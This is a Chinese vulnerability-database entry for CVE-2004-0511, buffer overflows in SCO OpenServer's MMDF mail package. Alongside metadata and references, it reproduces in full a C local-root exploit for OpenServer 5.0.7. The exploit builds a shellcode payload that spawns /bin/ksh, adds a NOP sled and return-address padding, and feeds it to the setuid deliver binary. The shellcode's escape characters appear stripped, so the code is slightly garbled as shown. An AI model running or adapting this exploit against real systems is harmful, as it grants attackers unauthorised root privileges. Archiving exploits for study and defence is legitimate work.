OpenServer MMDF多个缓冲区溢出漏洞

OpenServer MMDF多个缓冲区溢出漏洞

漏洞ID 1108064 漏洞类型 边界条件错误
发布时间 2004-07-20 更新时间 2005-10-20
图片[1]-OpenServer MMDF多个缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-0511
图片[2]-OpenServer MMDF多个缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-090
漏洞平台 SCO CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/24293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-090
|漏洞详情
OpenServer是一款由Caldera维护的商业性质Unix类型操作系统。OpenServer的MMDF包中execmail存在缓冲区溢出,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,提升权限。另外MMDF存在NULL指针废弃和CoreDump问题,可导致应用程序崩溃,
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/10758/info

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.
*/

/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "x68xffxf8xffx3c"  /*  pushl   $0x3cfff8ff               */
    "x6ax65"              /*  pushl   $0x65                     */
    "x89xe6"              /*  movl    %esp,%esi                 */
    "xf7x56x04"          /*  notl    0x04(%esi)                */
    "xf6x16"              /*  notb    (%esi)                    */
    "x31xc0"              /*  xorl    %eax,%eax                 */
    "x50"                  /*  pushl   %eax                      */
    "x68""/ksh"            /*  pushl   $0x68736b2f               */
    "x68""/bin"            /*  pushl   $0x6e69622f               */
    "x89xe3"              /*  movl    %esp,%ebx                 */
    "x50"                  /*  pushl   %eax                      */
    "x50"                  /*  pushl   %eax                      */
    "x53"                  /*  pushl   %ebx                      */
    "xb0x3b"              /*  movb    $0x3b,%al                 */
    "xffxd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86n");
    printf("Copyright 2004 Ramon de Carvalho Vallenn");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}
|参考资料

来源:XF
名称:openserver-mmdf-name-dos(16739)
链接:http://xforce.iss.net/xforce/xfdb/16739
来源:BID
名称:10758
链接:http://www.securityfocus.com/bid/10758
来源:SCO
名称:SCOSA-2004.7
链接:ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt

相关推荐: Bugzilla远程执行任意命令漏洞

Bugzilla远程执行任意命令漏洞 漏洞ID 1105824 漏洞类型 输入验证 发布时间 2000-05-11 更新时间 2005-10-20 CVE编号 CVE-2001-0329 CNNVD-ID CNNVD-200106-140 漏洞平台 CGI C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享